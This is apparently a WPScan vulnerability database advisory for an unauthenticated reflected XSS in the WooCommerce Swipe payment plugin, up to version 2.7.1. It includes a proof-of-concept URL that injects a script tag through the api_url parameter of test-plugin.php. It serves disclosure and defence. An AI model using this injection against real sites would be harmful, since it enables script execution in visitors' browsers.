WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS

2014-05-28T00:00:00
ID WPVDB-ID:37D7936A-165F-4C37-84A6-7BA5B59A0301
Type wpvulndb
Reporter wpvulndb
Modified 2020-09-22T07:40:25

Description

The last time it was checked the plugin was still affected and had been closed.

PoC

http://www.example.com/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%284%29%3C/script%3E